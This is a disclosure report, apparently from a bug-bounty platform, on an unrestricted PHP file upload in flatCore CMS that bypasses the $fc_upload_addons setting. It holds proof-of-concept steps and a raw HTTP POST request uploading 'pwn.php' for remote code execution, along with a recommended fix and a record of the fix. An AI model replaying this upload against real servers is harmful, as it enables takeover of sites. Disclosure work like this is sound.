Unrestricted Upload of File with Dangerous Type in flatcore/flatcore-cms


Reported on

Oct 12th 2021


Even with $fc_upload_addons = false, an attacker can still upload files by making the post request

Proof of Concept

  1. Enable $fc_upload_addons = true.
  2. Upload a PHP file, but do not send.
  3. Disable $fc_upload_addons = true.
  4. Send the file upload request. See that the file is still being uploaded to upload/plugins directory.

The following request uploads a malicious PHP script onto the server

POST /flatCore-CMS/acp/core/files.upload-script.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------167305252220314413616184565
Content-Length: 516
Connection: close
Cookie: acptheme=dark; PHPSESSID=6ffjvvcureq3dkrb4vco57bq6f

Content-Disposition: form-data; name="upload_type"
Content-Disposition: form-data; name="csrf_token"

Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: application/x-php


5: Go to to execute the malicious PHP script.


This vulnerability is capable of remote code execution with admin privileges

Recommended Fix

This occurs because files.upload-script.php does not check $fc_upload_addons is true before uploading.

haxatron modified the report
a year ago
haxatron modified the report
a year ago
Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick marked this as fixed with commit 1c31fc a year ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation